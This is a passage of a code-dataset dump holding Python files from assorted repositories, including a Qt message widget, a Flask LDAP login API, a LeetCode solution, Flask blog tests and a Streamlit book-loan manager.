border-bottom:\n 1px solid {{ conf.colors.messages.warning.border }};\n \"\"\"\n elif level == usertypes.MessageLevel.info:\n stylesheet += \"\"\"\n background-color: {{ conf.colors.messages.info.bg }};\n color: {{ conf.colors.messages.info.fg }};\n font: {{ conf.fonts.messages.info }};\n border-bottom: 1px solid {{ conf.colors.messages.info.border }}\n \"\"\"\n else: # pragma: no cover\n raise ValueError(\"Invalid level {!r}\".format(level))\n # We don't bother with set_register_stylesheet here as it's short-lived\n # anyways.\n config.set_register_stylesheet(self, stylesheet=stylesheet,\n update=False)\n\n\nclass MessageView(QWidget):\n\n \"\"\"Widget which stacks error/warning/info messages.\"\"\"\n\n update_geometry = pyqtSignal()\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self._messages = []\n self._vbox = QVBoxLayout(self)\n self._vbox.setContentsMargins(0, 0, 0, 0)\n self._vbox.setSpacing(0)\n self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)\n\n self._clear_timer = QTimer()\n self._clear_timer.timeout.connect(self.clear_messages)\n config.instance.changed.connect(self._set_clear_timer_interval)\n\n self._last_text = None\n\n def sizeHint(self):\n \"\"\"Get the proposed height for the view.\"\"\"\n height = sum(label.sizeHint().height() for label in self._messages)\n # The width isn't really relevant as we're expanding anyways.\n return QSize(-1, height)\n\n @config.change_filter('messages.timeout')\n def _set_clear_timer_interval(self):\n \"\"\"Configure self._clear_timer according to the config.\"\"\"\n interval = config.val.messages.timeout\n if interval > 0:\n interval *= min(5, len(self._messages))\n self._clear_timer.setInterval(interval)\n\n @pyqtSlot()\n def clear_messages(self):\n \"\"\"Hide and delete all messages.\"\"\"\n for widget in self._messages:\n self._vbox.removeWidget(widget)\n widget.hide()\n widget.deleteLater()\n self._messages = []\n self._last_text = None\n self.hide()\n self._clear_timer.stop()\n\n @pyqtSlot(usertypes.MessageLevel, str, bool)\n def show_message(self, level, text, replace=False):\n \"\"\"Show the given message with the given MessageLevel.\"\"\"\n if text == self._last_text:\n return\n\n if replace and self._messages and self._messages[-1].replace:\n old = self._messages.pop()\n old.hide()\n\n widget = Message(level, text, replace=replace, parent=self)\n self._vbox.addWidget(widget)\n widget.show()\n self._messages.append(widget)\n self._last_text = text\n self.show()\n self.update_geometry.emit()\n if config.val.messages.timeout != 0:\n self._set_clear_timer_interval()\n self._clear_timer.start()\n\n def mousePressEvent(self, e):\n \"\"\"Clear messages when they are clicked on.\"\"\"\n if e.button() in [Qt.LeftButton, Qt.MiddleButton, Qt.RightButton]:\n self.clear_messages()\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/48165_messageview.py","file_name":"48165_messageview.py","file_ext":"py","file_size_in_byte":4504,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"36998224616","text":"# -*- coding: utf-8 -*-\nimport os\nfrom setuptools import setup, find_packages\nfrom distutils.core import setup\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nversion = '0.1'\n\nsetup(\n name='django-perobject-permission',\n version=version,\n description=\"Simple, flexible and scalable Django authorization backend that handle per-object permission management\",\n long_description=read('README.md'),\n classifiers=[\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n \"Framework :: Django\",\n \"Environment :: Web Environment\",\n ],\n keywords=['authorization', 'backends', 'django', 'rules', 'permissions', 'rulez','perobject'],\n author='Lodato Luciano',\n author_email='lodato.luciano@gmail.com',\n url='http://github.com/lodatol/django-perobject-permission',\n license='BSD',\n packages=find_packages(),\n zip_safe=False,\n)\n","repo_name":"lodatol/django-perobject-permission","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"36129042399","text":"class Solution:\n def PredictTheWinner(self, nums) -> bool:\n if len(nums) % 2 == 0:\n return True\n n = len(nums)\n dp = [[0] * n for i in range(n)]\n for i in range(n):\n dp[i][i] = nums[i]\n for i in range(n-2, -1, -1): # idx n-1 is filled with nums[n-1]\n for j in range(i+1, n):\n dp[i][j] = max(nums[i] - dp[i+1][j], nums[j] - dp[i][j-1])\n return dp[0][-1] >= 0\n\n \"\"\"This solution used the intuition that if our opponent's score is n, then our score is sum(nums) - n.\nSo for each iteration:\n\nPass the sum of nums summ\nIf There are only 2 numbers in nums - return max(nums)\nGet opponents score for both condition\nIf first number is chosen choose_first\nIf last number is chosen choose_last\nReturn the maximum of the both scores we can get\"\"\"\n\n def PredictTheWinner2(self, nums) -> bool:\n total = sum(nums)\n if not len(nums) % 2:\n return True\n\n def count_score(curr, total):\n if len(curr) <= 2:\n return max(curr)\n # the opponent's choise\n start = count_score(curr[1:], total - curr[0])\n end = count_score(curr[:-1], total - curr[-1])\n return max(total - start, total - end)\n\n return count_score(nums, total) >= total / 2\n\n def PredictTheWinner3(self, nums) -> bool:\n if not len(nums) % 2:\n return True\n def winner(curr, s, e, turn):\n if s == e:\n return turn * curr[s]\n a = turn * curr[s] + winner(curr, s+1, e, -turn)\n b = turn * curr[e] + winner(curr, s, e-1, -turn)\n return turn * max(turn*a, turn*b) # max 里*turn是因为ab里带turn有可能负\n return winner(nums, 0, len(nums)-1, 1) >= 0\n\n\n","repo_name":"arianacai1997/take_your_dog_to_work","sub_path":"486M/486M.py","file_name":"486M.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"24775227596","text":"#! /usr/bin/env python\n\nfrom __future__ import print_function\n\nimport argparse\nimport os.path\nimport subprocess\nimport sys\nimport shutil\nimport tarfile\n\nNONE_FLAG = []\nextra_flags = NONE_FLAG\n\nROOT = os.path.dirname(os.path.abspath(__file__))\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"domain_knowledge\", help=\"path to domain knowledge file\")\n parser.add_argument(\"domain\", help=\"path to domain file\")\n parser.add_argument(\"problem\", help=\"path to problem file\")\n parser.add_argument(\"plan\", help=\"path to output plan file\")\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n # best_model_path = os.join.path(args.dk, \"best_model/model.pt\")\n\n ROOT = os.path.dirname(os.path.abspath(__file__))\n REPO_GNN_LEARNING = f\"{ROOT}/gnn-learning\"\n SCORPION_PATH = f\"{ROOT}/scorpion\"\n\n DK_DIR_FILE = args.domain_knowledge\n DOMAIN = args.domain\n PROBLEM = args.problem\n PLAN_OUT = args.plan\n\n dk_folder = f\"extracted\"\n\n # uncompress domain knowledge file\n with tarfile.open(args.domain_knowledge, \"r:gz\") as tar:\n if os.path.exists(dk_folder):\n shutil.rmtree(dk_folder)\n tar.extractall(dk_folder)\n\n\n \n # DK_DIR = f'{ROOT}/DK'\n\n # if os.path.exists(DK_DIR):\n # shutil.rmtree(DK_DIR)\n # os.mkdir(DK_DIR)\n\n # shutil.unpack_archive(DK_DIR_FILE, DK_DIR ,'zip')\n \n model_path = os.path.join(dk_folder, \"model.pt\")\n # preprocessor_settings = os.path.join(dk_folder, \"DK\", \"preprocessor_settings.txt\")\n preprocessor_settings = \"gnn-retries,2,gnn-threshold,0.5,model-path,extracted/DK/model.pt\"\n\n\n subprocess.check_call(\n [f'{SCORPION_PATH}/fast-downward.py']\n + extra_flags + [\n '--alias', 'lama-first',\n '--keep-sas-file',\n '--transform-task-options', preprocessor_settings,\n '--transform-task', f'{REPO_GNN_LEARNING}/src/preprocessor.command',\n '--overall-time-limit', '2400',\n '--search-time-limit', '500',\n DOMAIN,\n PROBLEM])\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ipc2023-learning/repo01","sub_path":"plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8393689973","text":"import click\nimport os\nimport logging\nimport string\nimport random\nimport sys\nimport yaml\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom bubblechamber.model import Base\nfrom bubblechamber.model import File as BCFile\nfrom bubblechamber.model import Process as BCProcess\nfrom bubblechamber.model import Container as BCContainer\nfrom bubblechamber.model import ApiKey as BCApiKey\n\ndef __load_config(debug):\n config_file = 'config.yml'\n if 'BC_CONFIG' in os.environ:\n config_file = os.environ['BC_CONFIG']\n\n config = {}\n if os.path.exists(config_file):\n with open(config_file, 'r') as ymlfile:\n config = yaml.load(ymlfile)\n\n if debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n if os.environ.get('BC_MYSQL_URL', None):\n config['mysql']['url'] = os.environ['BC_MYSQL_URL']\n\n return config\n\n\n@click.group()\ndef run():\n pass\n\n@run.command()\n@click.option('--api', help='API key')\n@click.option('--debug', help=\"set log level to debug\", is_flag=True)\ndef delete(api, debug):\n if not api:\n print(\"Api key missing\")\n sys.exit(1)\n\n cfg = __load_config(debug)\n engine = create_engine(cfg['mysql']['url'], pool_recycle=3600, echo=cfg['mysql'].get('debug', False))\n maker = sessionmaker(bind=engine)\n sqlSession = maker()\n # generate api key\n bc_apikey = sqlSession.query(BCApiKey).filter_by(key=api).first()\n if bc_apikey:\n sqlSession.delete(bc_apikey)\n sqlSession.commit()\n else:\n print(\"No matching apikey found\")\n sqlSession.close()\n\n@run.command()\n@click.option('--owner', help='API key user owner')\n@click.option('--debug', help=\"set log level to debug\", is_flag=True)\ndef create(owner, debug):\n if not owner:\n print(\"Owner missing\")\n sys.exit(1)\n\n cfg = __load_config(debug)\n engine = create_engine(cfg['mysql']['url'], pool_recycle=3600, echo=cfg['mysql'].get('debug', False))\n maker = sessionmaker(bind=engine)\n sqlSession = maker()\n # generate api key\n key = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(10))\n bc_apikey = BCApiKey(\n key=key,\n email=owner\n )\n sqlSession.add(bc_apikey)\n sqlSession.commit()\n sqlSession.close()\n print(\"Api key: %s\" % (key))\n return key\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"osallou/sysdig-analyser","sub_path":"bc_api.py","file_name":"bc_api.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"5823351936","text":"class Student:\r\n def __init__(self, name, surname, student_id, course, faculty, speciality):\r\n self.full_name = f\"{name} {surname}\"\r\n self.id = student_id\r\n self.s_course = course\r\n self.s_faculty = faculty\r\n self.speciality = speciality\r\n self.is_local_student = False\r\n self.subjects = []\r\n self.semester = 1\r\n\r\n def AllInfo(self):\r\n print(f\"full name: {self.full_name}\")\r\n print(f\"id: {self.id}\")\r\n print(f\"course: {self.s_course}\")\r\n print(f\"faculty: {self.s_faculty.faculty_name}\")\r\n print(f\"speciality: {self.speciality}\")\r\n print(f\"is local student: {self.is_local_student}\")\r\n print(f\"subjects: {', '.join(self.subjects)}\")\r\n print(f\"semester: {self.semester}\")\r\n\r\n def add_subject(self, subject):\r\n self.subjects.append(subject)\r\n\r\n def transfer_to_next_semester(self):\r\n self.semester += 1\r\n next_course = (self.semester - 1) // 2 + 1\r\n self.s_course = next_course\r\n self.subjects.clear()\r\n\r\n\r\nclass Faculty:\r\n def __init__(self, name, dean, cabinet_number):\r\n self.faculty_name = name\r\n self.dean = dean\r\n self.cabinet_number = cabinet_number\r\n self.students = []\r\n\r\n def add_student(self, student):\r\n self.students.append(student)\r\n student.s_faculty = self\r\n\r\n def withdraw_student(self, student_id):\r\n for student in self.students:\r\n if student.id == student_id:\r\n self.students.remove(student)\r\n student.s_faculty = None\r\n break\r\n\r\n\r\ndef main():\r\n faculty1 = Faculty(\"Math\", \"Mr. Arman\", \"Cabinet 99\")\r\n faculty2 = Faculty(\"Computer Science\", \"Dr. Darkhan\", \"Cabinet 23\")\r\n\r\n student1 = Student(\"Alan\", \"Tasbulatov\", 115, 3, faculty1, \"Big Data\")\r\n student2 = Student(\"Bauyrzhan\", \"Sikhymbek\", 251, 3, faculty1, \"Oil Engineering\")\r\n student3 = Student(\"Yu\", \"Alexandr\", 390, 3, faculty2, \"IT C#\")\r\n\r\n faculty1.add_student(student1)\r\n faculty1.add_student(student2)\r\n faculty2.add_student(student3)\r\n\r\n # removed student with student_id = 251: Bauyrzhan Sikhymbek \r\n faculty1.withdraw_student(251)\r\n\r\n print(f\"students of {faculty1.faculty_name}:\")\r\n for student in faculty1.students:\r\n student.AllInfo()\r\n\r\n print()\r\n\r\n print(f\"students of {faculty2.faculty_name}:\")\r\n for student in faculty2.students:\r\n student.AllInfo()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Disarray77/ObjectOrientedProg","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"29480712866","text":"import os, glob, importlib\n\n_path = os.path.dirname(os.path.abspath(__file__))\nhandlers = []\n\nfor h in [\".{}\".format(os.path.basename(x).replace(\".py\", \"\")) for x in glob.glob(\"{}/*.py\".format(_path)) if \"__init__\" not in x]:\n handlers.append(importlib.import_module(h, \"galvatron_lib.core.location_handlers\"))\n\nhandlers = sorted(handlers, key=lambda m: m.priority)\n\ndef get_handler(location):\n handler = [x for x in handlers if x.handles(location)][0]\n return handler\n","repo_name":"bad-hombres/galvatron","sub_path":"galvatron_lib/core/location_handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"22339126109","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nimport testData as d\nimport sys, json, uuid\nfrom ldap3 import Server, Connection, ALL, NTLM, SUBTREE\nfrom ldap3.core.exceptions import LDAPBindError\nfrom datetime import datetime, timedelta\nfrom pprint import pprint\n# configuration\nDEBUG = True\n\n# instantiate the app\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# enable CORS\nCORS(app)\n\n# sanity check route\n@app.route('/login', methods=['POST'])\ndef login():\n response_object = {'status': 'success',\n 'message': 'Auth Accepted'}\n post_data = request.get_json()\n given_login = post_data['user_login']\n login = \"KZGROUP\\\\\" + given_login # domain to database and admin page\n passwd = post_data['pass']\n server = Server('kzgroup.local', get_info=ALL)\n try:\n with Connection(server, user=login,password=passwd,\n authentication=NTLM, auto_bind=True) as conn:\n conn.search('DC=kzgroup,DC=local',\n \"(&(sAMAccountName=\" + given_login + \"))\",\n attributes=['mail'])\n mailbox = conn.entries[0]['mail']\n # to database\n conn.search('DC=kzgroup,DC=local',\n \"(&(sAMAccountName=\" + given_login + \"))\",\n SUBTREE,\n attributes=['memberof'])\n rawGroups=conn.entries[0]['memberof'].values\n groups=[]\n for group in rawGroups:\n groups.append(group.split(',')[0][3:])\n conn.unbind()\n response_object['userlogin'] = given_login # to database\n response_object['token'] = uuid.uuid4().hex # to database\n response_object['tokenExp'] = datetime.now() + timedelta(days=2) # to database\n pprint( response_object['tokenExp'] )\n return jsonify(response_object), 200\n except LDAPBindError as err:\n response_object['message'] = \"Invalid Credentials\"\n response_object['status'] = \"warning\"\n return jsonify(response_object), 401\n\n@app.route('/prod_db', methods=['GET','POST'])\ndef prod_db():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n post_data = request.get_json()\n d.prodData.append({\n 'title': post_data.get('title'),\n 'responsible': post_data.get('responsible'),\n 'production': post_data.get('production')\n })\n response_object['message'] = 'DB added!'\n else:\n response_object['dbs'] = d.prodData\n return jsonify(response_object)\n\n@app.route('/dev_db', methods=['GET','POST'])\ndef dev_db():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n post_data = request.get_json()\n d.devData.append({\n 'title': post_data.get('title'),\n 'responsible': post_data.get('responsible'),\n 'production': post_data.get('production')\n })\n response_object['message'] = 'DB added!'\n else:\n response_object['dbs'] = d.devData\n return jsonify(response_object)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=3000)\n\n","repo_name":"major-sam/py_server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"39546230107","text":"import math\n\ndef main():\n #escribe tu código abajo de esta línea\n ap = float(input(\"Area a pintar en metros: \"))\n r = float(input(\"Rendimiento (m2/l): \"))\n cl = math.ceil(ap/r)\n print(\"Litros a comprar:\",cl)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"C-SIN-TC1028-002-2113/ses03-ej1-valeriaaaen","sub_path":"assignments/13CantidadLitrosPintura/src/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21849002637","text":"import os.path\nfrom setuptools import setup\n\n# The directory containing this file\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n# The text of the README file\nwith open(os.path.join(HERE, \"README.md\")) as fid:\n README = fid.read()\n\n# This call to setup() does all the work\nsetup(\n name=\"vaccine-slot-finder\",\n version=\"0.0.1\",\n description=\"The Project to find the vaccine on the basis of age, location, district, pincode, available slot and notified via email, slack or google chat\",\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/shubham-mahajan/vaccine-slot-finder\",\n author=\"Shubham Mahajan\",\n author_email=\"contact@binarybugs.com\",\n license=\"MIT\",\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n ],\n packages=[\"reader\"],\n include_package_data=True,\n install_requires=[\n \"requests\", \"python-dotenv\"\n ]\n)","repo_name":"shubham-mahajan/vaccine-slot-finder","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"23643396729","text":"'''\n 斐波那数列 \n 1,1,2,3,5,8,13,21,34...\n'''\nimport time\n\ndef fib(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a,b = b,a+b\n n += 1\n return \"done\"\n\nfib(10) \n\n# 生成器--解决如果max过大会导致卡顿问题\ndef fib_list(max):\n n, a, b = 0, 0, 1\n while n < max:\n # 转化成生成器\n yield b\n a,b = b,a+b\n n += 1\n # 用语异常打印效果\n return \"done\"\n\nf = fib_list(100)\n\n# 唤醒\nprint(f.__next__())\nprint(f.__next__())\nprint(f.__next__())\nprint(f.__next__())\nprint(f.__next__())\n\n# 生成器的运用\ndef consumer(name):\n print(name + \"准备...\")\n while True:\n baozi = yield\n print(name + \"吃包子\")\n\ndef producer(name):\n c = consumer(\"A\")\n cx = consumer(\"B\")\n c.__next__()\n cx.__next__()\n print(\"开始测试\")\n for i in range(10):\n time.sleep(1)\n print(\"测试执行\")\n c.send(i)\n cx.send(i)\n\n\nproducer(\"lxw\")","repo_name":"HardProgrammer/pythonRoad","sub_path":"com/demo/fibfunction.py","file_name":"fibfunction.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70338694988","text":"import os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Database\n# https://docs.djangoproject.com/en/2.0/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.postgresql_psycopg2\",\n \"NAME\": os.environ.get(\"DATABASE_NAME\", \"accounts\"),\n \"USER\": os.environ.get(\"DATABASE_USER\", \"postgres\"),\n \"PASSWORD\": os.environ.get(\"DATABASE_PASSWORD\", \"secret\"),\n \"HOST\": os.environ.get(\"DATABASE_HOST\", \"localhost\"),\n \"PORT\": os.environ.get(\"DATABASE_PORT\", \"5496\"),\n }\n}\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.0/howto/static-files/\n\nSTATIC_URL = \"/static/\"\nSTATICFILES_LOCATION = \"static\"\nSTATIC_ROOT = BASE_DIR + \"/static\"\nSTATICFILES_DIRS = [os.path.join(BASE_DIR, 'assets')]\n\nMEDIAFILES_LOCATION = 'media'\nMEDIA_URL = '/media/'\nMEDIA_ROOT = BASE_DIR + '/' + MEDIAFILES_LOCATION\n\n# CORS\n\nCORS_ALLOWED_ORIGINS = [\n \"http://localhost:3000\"\n]\n\nALLOWED_HOSTS = [\n \"0.0.0.0\",\n \"127.0.0.1\",\n \"localhost\"\n]\n\nCSRF_TRUSTED_ORIGINS = [\n \"http://localhost:3000\"\n]\n","repo_name":"JokusPokus/assessment-scheduler","sub_path":"backend/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"75193605389","text":"import torch\nfrom utils import AverageMeter\nimport time\nimport numpy as np\n\nimport os\nimport data_manager\nfrom model import ft_net, ft_net_dense\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\n\nimport scipy.io\nfrom dataset_loader import ImageDataset\n\n\nimport argparse\nparser = argparse.ArgumentParser(description='Training')\nparser.add_argument('--model_path', default='resnet', type=str, help='save model path')\nparser.add_argument('--batchsize', default=32, type=int, help='batchsize')\nparser.add_argument('--use_dense', action='store_true', help='use densenet')\nparser.add_argument('--n_classe', default=1367, help='n classes')\nparser.add_argument('--dataset', default='/home/paul/datasets', type=str, help='Path to the dataset')\n\nopt = parser.parse_args()\nn_classe = opt.n_classe\n\ndef test(model, queryloader, galleryloader, use_gpu, ranks=[1, 5, 10, 20]):\n batch_time = AverageMeter()\n\n model.eval()\n\n with torch.no_grad():\n qf, q_pids, q_camids = [], [], []\n for batch_idx, (imgs, pids, camids) in enumerate(queryloader):\n if use_gpu: imgs = imgs.cuda()\n\n end = time.time()\n features = model(imgs)\n batch_time.update(time.time() - end)\n\n features = features.data.cpu()\n qf.append(features)\n q_pids.extend(pids)\n q_camids.extend(camids)\n qf = torch.cat(qf, 0)\n q_pids = np.asarray(q_pids)\n q_camids = np.asarray(q_camids)\n\n print(\"Extracted features for query set, obtained {}-by-{} matrix\".format(qf.size(0), qf.size(1)))\n\n gf, g_pids, g_camids = [], [], []\n end = time.time()\n for batch_idx, (imgs, pids, camids) in enumerate(galleryloader):\n if use_gpu: imgs = imgs.cuda()\n\n end = time.time()\n features = model(imgs)\n batch_time.update(time.time() - end)\n\n features = features.data.cpu()\n gf.append(features)\n g_pids.extend(pids)\n g_camids.extend(camids)\n gf = torch.cat(gf, 0)\n g_pids = np.asarray(g_pids)\n g_camids = np.asarray(g_camids)\n\n print(\"Extracted features for gallery set, obtained {}-by-{} matrix\".format(gf.size(0), gf.size(1)))\n\n print(\"==> BatchTime(s)/BatchSize(img): {:.3f}/{}\".format(batch_time.avg, 32))\n\n m, n = qf.size(0), gf.size(0)\n distmat = torch.pow(qf, 2).sum(dim=1, keepdim=True).expand(m, n) + \\\n torch.pow(gf, 2).sum(dim=1, keepdim=True).expand(n, m).t()\n distmat.addmm_(1, -2, qf, gf.t())\n distmat = distmat.numpy()\n # Save to Matlab for check\n result = {'distmat':distmat, 'q_pids': q_pids, 'g_pids':g_pids,\n 'q_camids':q_camids, 'g_camids': g_camids,\n 'query_feature': qf.numpy(), 'gallery_feature': gf.numpy()}\n print(qf.numpy())\n print(gf.numpy())\n scipy.io.savemat('./result.mat', result)\n\n\n\ndef load_network(network):\n save_path = os.path.join(opt.model_path)\n network.load_state_dict(torch.load(save_path))\n return network\n\n# --------\n\nuse_dense = opt.use_dense\nif __name__ == '__main__':\n\n use_gpu = torch.cuda.is_available()\n data_transforms = transforms.Compose([\n transforms.Resize((288, 144), interpolation=3),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n\n ])\n\n if opt.use_dense:\n model_structure = ft_net_dense(n_classe)\n else:\n model_structure = ft_net(n_classe)\n model = load_network(model_structure)\n # Change to test mode\n model = model.eval()\n if use_gpu:\n model = model.cuda()\n\n dataset = data_manager.init_img_dataset(\n root=opt.dataset, name='cuhk03', split_id=0, cuhk03_classic_split=True)\n\n queryloader = DataLoader(\n ImageDataset(dataset.query, transform=data_transforms),\n batch_size=32, shuffle=False, num_workers=4, drop_last=False,\n )\n\n galleryloader = DataLoader(\n ImageDataset(dataset.gallery, transform=data_transforms),\n batch_size=32, shuffle=False, num_workers=4, drop_last=False,\n )\n test(model, queryloader, galleryloader, use_gpu)","repo_name":"jpainam/SLS_ReID","sub_path":"test_cuhk03.py","file_name":"test_cuhk03.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"82"} +{"seq_id":"72111093069","text":"import pytest\n\nfrom flaskr.db import get_db\n\n\ndef test_index(client, auth):\n response = client.get(\"/\")\n assert b\"Log In\" in response.data\n assert b\"Register\" in response.data\n\n auth.login()\n response = client.get(\"/\")\n assert b\"test title\" in response.data\n assert b\"by test on 2018-01-01\" in response.data\n assert b\"test\\nbody\" in response.data\n assert b'href=\"/1/update\"' in response.data\n\n\n@pytest.mark.parametrize(\"path\", (\"/create\", \"/1/update\", \"/1/delete\"))\ndef test_login_required(client, path):\n response = client.post(path)\n assert response.headers[\"Location\"] == \"/auth/login\"\n\n\ndef test_author_required(app, client, auth):\n # change the post author to another user\n with app.app_context():\n db = get_db()\n db.execute(\"UPDATE post SET author_id = 2 WHERE id = 1\")\n db.commit()\n\n auth.login()\n # current user can't modify other user's post\n assert client.post(\"/1/update\").status_code == 403\n assert client.post(\"/1/delete\").status_code == 403\n # current user doesn't see edit link\n assert b'href=\"/1/update\"' not in client.get(\"/\").data\n\n\n@pytest.mark.parametrize(\"path\", (\"/2/update\", \"/2/delete\"))\ndef test_exists_required(client, auth, path):\n auth.login()\n assert client.post(path).status_code == 404\n\n\ndef test_create(client, auth, app):\n auth.login()\n assert client.get(\"/create\").status_code == 200\n client.post(\"/create\", data={\"title\": \"created\", \"body\": \"\"})\n\n with app.app_context():\n db = get_db()\n count = db.execute(\"SELECT COUNT(id) FROM post\").fetchone()[0]\n assert count == 2\n\n\ndef test_update(client, auth, app):\n auth.login()\n assert client.get(\"/1/update\").status_code == 200\n client.post(\"/1/update\", data={\"title\": \"updated\", \"body\": \"\"})\n\n with app.app_context():\n db = get_db()\n post = db.execute(\"SELECT * FROM post WHERE id = 1\").fetchone()\n assert post[\"title\"] == \"updated\"\n\n\n@pytest.mark.parametrize(\"path\", (\"/create\", \"/1/update\"))\ndef test_create_update_validate(client, auth, path):\n auth.login()\n response = client.post(path, data={\"title\": \"\", \"body\": \"\"})\n assert b\"Title is required.\" in response.data\n\n\ndef test_delete(client, auth, app):\n auth.login()\n response = client.post(\"/1/delete\")\n assert response.headers[\"Location\"] == \"/\"\n\n with app.app_context():\n db = get_db()\n post = db.execute(\"SELECT * FROM post WHERE id = 1\").fetchone()\n assert post is None\n","repo_name":"pallets/flask","sub_path":"examples/tutorial/tests/test_blog.py","file_name":"test_blog.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":65003,"dataset":"github-code","pt":"82"} +{"seq_id":"39859451094","text":"import streamlit as st\nfrom mongo_utils import get_mongo_db\nfrom libros import get_libros\nfrom bson import ObjectId\nimport datetime\nfrom datetime import date\nimport time\n\ndb = get_mongo_db()\n\n# Function to create a new prestamo\ndef create_prestamo(user_id, book_id, loan_date, return_date):\n # Save the data to the database\n prestamos_col = db['prestamos']\n prestamo_data = {\n 'user_id': user_id,\n 'book_id': book_id,\n 'loan_date': loan_date,\n 'return_date': return_date\n }\n prestamos_col.insert_one(prestamo_data)\n\n# Function to update an existing prestamo\ndef update_prestamo(id, user_id, book_id, loan_date, return_date):\n # Save the updated data to the database\n prestamos_col = db['prestamos']\n prestamo_data = {\n 'user_id': user_id,\n 'book_id': book_id,\n 'loan_date': loan_date,\n 'return_date': return_date\n }\n prestamos_col.update_one({'_id': id}, {'$set': prestamo_data})\n\n# Function to update a prestamo with a form\ndef update_prestamo_form(prestamo_id):\n prestamos_col = db['prestamos']\n row = prestamos_col.find_one({'_id': prestamo_id})\n with st.form(key='update_prestamo_form'):\n user_id = st.session_state.usuario \n book_id = st.selectbox('Select book:', get_libros())\n loan_date = st.date_input('Loan Date:', value=datetime.datetime.strptime(row['loan_date'], '%Y-%m-%d').date(), min_value=date.today())\n return_date = st.date_input('Return Date:', value=datetime.datetime.strptime(row['return_date'], '%Y-%m-%d').date(), min_value=date.today())\n if st.form_submit_button(\"Confirm Update\"):\n # Update the prestamo when the button is clicked\n update_prestamo(id=row['_id'], user_id=user_id, book_id=book_id, loan_date=loan_date.isoformat, return_date=return_date.isoformat)\n\n# Function to delete an existing prestamo\ndef delete_prestamo(prestamo_id):\n prestamos_col = db['prestamos']\n prestamo = prestamos_col.find_one({'_id': prestamo_id})\n\n if prestamo:\n prestamos_col.delete_one({'_id': prestamo['_id']})\n print(f\"Prestamo {prestamo_id} deleted successfully.\")\n else:\n print(f\"Prestamo {prestamo_id} not found.\")\n\n# Function to retrieve a list of prestamos\ndef get_prestamos():\n prestamos_col = db['prestamos']\n cursor = prestamos_col.find({})\n prestamos = [{'_id': prestamo['_id'], 'user_id': prestamo['user_id'], 'book_id': prestamo['book_id'],\n 'loan_date': prestamo['loan_date'], 'return_date': prestamo['return_date']} for prestamo in cursor]\n return prestamos\n\n\ndef prestamosApp():\n prestamo_operations = ['Create Prestamo', 